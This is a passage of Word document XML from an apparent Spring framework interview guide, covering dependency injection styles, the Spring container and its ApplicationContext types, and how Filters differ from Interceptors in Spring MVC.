            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5018DC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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64C2F3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simplicity, often used in frameworks like Spring.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25F8D15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Simple and concise. - Does not require constructors or setters.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5584642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akes dependencies less explicit and harder to test. - Difficult to see if a class has all its required dependencies.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1266A6E2"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71CDD7C"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preferred when dependencies are mandatory and immutable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7969860E"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is useful when dependencies are optional or may change over time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6048C72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xml:space="preserve"> is a less common pattern but can provide flexibility and decoupling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630C73E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r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used in frameworks like Spring for simplicity but is less explicit and harder to maintain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC6B41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modern frameworks like </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spr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typically the preferred method as it makes dependencies clear and helps ensure that objects are fully initialized with all required dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AF31C8" w14:textId="68B38F2B"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21" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E75A675" w14:textId="24513031" w:rsidR="00A930F5" w:rsidRPr="00CE4B95" w:rsidRDefault="004D0ECE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="460" w:name="_Toc197867674"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Who will take care of objects in Spring</w:t>
      </w:r>
      <w:r w:rsidR="00A930F5" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="460"/>
    </w:p>
    <w:p w14:paraId="48C918E0" w14:textId="7FFF11AB" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D109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xml:space="preserve">,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xml:space="preserve"> is responsible for managing the lifecycle of objects. The container is responsible for </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>instantiat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figuring</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anaging</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the dependencies of beans (objects).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CC32D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Responsibilities of the Spring Container:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C88B9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It creates objects (beans) based on the configuration provided (either through XML configuration or annotations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A14134"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It automatically injects dependencies into the beans based on the configuration (either via constructor injection, setter injection, or field injection).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4F5E0E"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 Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It manages the lifecycle of beans, including initialization and destruction, allowing for hooks to add custom logic during these phases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D803B8"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 Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: It can manage the scope of beans, such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>singlet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prototyp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request</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ssion</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0713925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naging Bean Dependencies</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It resolves and injects bean dependencies by looking up beans and wiring them based on the configuration (e.g., autowiring).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E308FA"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Spring Containers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DC16B7"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Factory</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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monly used when resources are constrained (e.g., in mobile applications).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D0F6E19"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A more advanced container that extends BeanFactory. It is the most commonly used container in Spring. It provides additional features like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FF730D"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vent propagation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19ED7585"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clarative mechanisms to create a bean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C220D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nationalization (i18n) support.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4372DAC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 means to read and process application configuration (e.g., annotations, property files).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283FFC1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Common ApplicationContext Implementations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B75C4B"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lassPathXmlApplicationContext</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Loads the context from an XML file on the classpath.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5C83D6"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nnotationConfigApplicationContext</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Loads the context from annotated configuration classes (typically used for Java-based Spring configurations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3A735F"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GenericWebApplicationContext</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used for web-based applications, providing advanced features for working with Spring MVC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F68DA0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Lifecycle Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44821D0F"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When the application starts, the Spring container reads the configuration (XML or annotations) and creates instances of beans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA19759"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The container automatically injects dependencies into the beans according to the configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283815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ost-Initialization</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If any post-initialization hooks are configured (such as @PostConstruct or InitializingBean), the container invokes them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9B36F1"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Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Beans are then available for use by the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9779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struction</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When the application stops, the Spring container manages the destruction of beans, calling any defined destruction methods (@PreDestroy, DisposableBean, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711ABF3C"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ample:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A276340"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XML-based Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44174ADE"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4C9FFE77"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car" class="com.example.Car"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F1F093"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property name="engine" ref="engine" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA70CF8"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gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA97091" w14:textId="77777777" w:rsidR="007D1098" w:rsidRPr="00452C19" w:rsidRDefault="007D1098" w:rsidP="00452C19">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="625048C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engine" class="com.example.Engine" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D05264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0999604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ava-based Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0F8DBC"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ation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBD4E7F"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Scan(basePackages = "com.example")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087938E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AppConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D87C1F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C2808DA"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setup, the Spring container will manage the Car and Engine beans, instantiating them and injecting the Engine dependency into Car.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E865E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C9AB03B"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Spring, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Container (ApplicationContext)</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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22" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="49ADD9D8" w14:textId="6E463221" w:rsidR="00A930F5" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD2381">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="461" w:name="_Toc197867675"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is ApplicationContext and its types in Spring</w:t>
      </w:r>
      <w:r w:rsidR="00A930F5" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="461"/>
    </w:p>
    <w:p w14:paraId="56A2DBC0" w14:textId="3F46D29E" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA"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Features of ApplicationContext:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDBCC55"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management</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It manages the complete lifecycle of beans (objects), including their creation, initialization, and destruction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3AC899"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Handles automatic injection of dependencies into beans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702E68C0"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vent handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows beans to publish and listen to events, providing decoupled communication between components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F757F6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ssageSource</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides support for internationalization (i18n) by enabling the retrieval of messages from property files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A5F47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OP support</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Integrates seamlessly with Spring AOP (Aspect-Oriented Programming) to apply cross-cutting concerns like logging, security, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA0C68A"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 context configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Can be configured using XML, annotations, or Java-based configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ED43E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ApplicationContext in Spring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515379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Different types of ApplicationContext provide specific features depending on the use case. The most common types of ApplicationContext are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A69B36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lassPathXmlApplicationContext:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1414CA05"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loads the Spring context from an XML file located in the classpath. This was the traditional way of configuring Spring before annotations became popular.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C96D37E"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when you have a lot of legacy code or need to maintain XML-based configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413C730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715768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ClassPathXmlApplicationContext("beans.xml");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7138F1"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AnnotationConfigApplicationContext:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA240DB"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for Java-based configuration, which is often more type-safe and easier to maintain compared to XML-based configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9EDA17"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allows you to define beans using annotations like @Component, @Configuration, @Bean, and scan the classpath for components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B21779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DF6213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AnnotationConfigApplicationContext(AppConfig.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766525E6"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GenericWebApplicationContext:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216BF07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specifically for web applications, as it provides additional support for web-related functionality in Spring, such as integrating with Spring MVC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F53EF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d in web applications configured with Spring Boot or a standard Spring Web MVC application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7DE1AD"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B47700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WebApplicationContext context = new GenericWebApplicationContext();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA2AA7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317382B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376A38E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GenericApplicationContext:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011636B6"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a flexible, generic implementation of ApplicationContext that is used for general-purpose Spring applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3DA574"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can be used when you're not working specifically with web applications, allowing a more general approach to Spring configuration with Java-based configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74013BF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E665C74"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ApplicationContext context = new GenericApplicationContext();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F5B35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57EF064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07D07F34"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FileSystemXmlApplicationContext:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ACA436"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similar to ClassPathXmlApplicationContext, but instead of loading the configuration from the classpath, it loads the Spring context from an XML file located anywhere in the file system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E249FE8"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ful when the XML configuration file is not bundled in the classpath.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E175D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16BBA2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FileSystemXmlApplicationContext("file:/path/to/beans.xml");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD0D69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GenericWebApplicationContext (Spring Boot-specific):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C60F37" w14:textId="77777777" w:rsidR="00B93CEA" w:rsidRPr="00452C19" w:rsidRDefault="00B93CEA" w:rsidP="00452C19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="190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pring Boot, this is used for initializing and bootstrapping a Spring-based web application. It integrates with Spring MVC and other web modules to make development faster and easier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2342843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9D77757"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heart of the Spring IoC container and manages the lifecycle and configuration of beans in the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0A2F60"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provides additional features over the basic BeanFactory container, such as event propagation, internationalization, and AOP support.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C86FDC"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23" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7C6C4C" w14:textId="67245DC5" w:rsidR="006164D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00E51CDA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="462" w:name="_Toc197867676"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Filter and Interceptor in Spring MVC</w:t>
      </w:r>
      <w:r w:rsidR="006164D4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="462"/>
    </w:p>
    <w:p w14:paraId="7DA7BA2D" w14:textId="7192E8DE" w:rsidR="00644808" w:rsidRPr="00452C19" w:rsidRDefault="0064480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Definition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7A05F2"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Filter</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: A filter is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works at the level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e.g., Tomcat). It performs tasks before the request reaches the servlet or after the response leaves the servlet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2742CC37"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An interceptor is a Spring-specific mechanism that is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It works at the </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>controller level</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and is often used for tasks like logging, authentication, and modifying the model data before and after the controller method execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A10F6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cope:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D8CFD0"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part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part of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framework and are used in the request handling lifecycle, specifically in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>controller</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> layer. They are configured in the Spring configuration file (@Configuration) or using Java config.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D050C2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Point of Execution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B03DD0"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executed before the request reach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and after the response leav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i.e., before and after the entire Spring MVC processing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154021F7"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executed before and after the controller method is invoked by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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5863CC8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Configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AB5CE6"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configured in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>web.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00452C19">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or using @WebFilter annotation in modern web apps) and are generally applied at the Servlet level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541799F4"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configured in the Spring configuration class, often using HandlerInterceptor interface and WebMvcConfigurer class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2879FA89"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Lifecycle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8D2BE3"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work at the controller level and can modify the model, perform pre-processing before the controller method is called, and post-processing after the controller method is executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDBA3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Method Signature:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4120D8C3"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implemented using the javax.servlet.Filter interface and override methods such as doFilter() which accepts ServletRequest and ServletResponse objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24288E2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2E140E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5684EC7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4704A5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w:t>
      </w:r>
    </w:p>
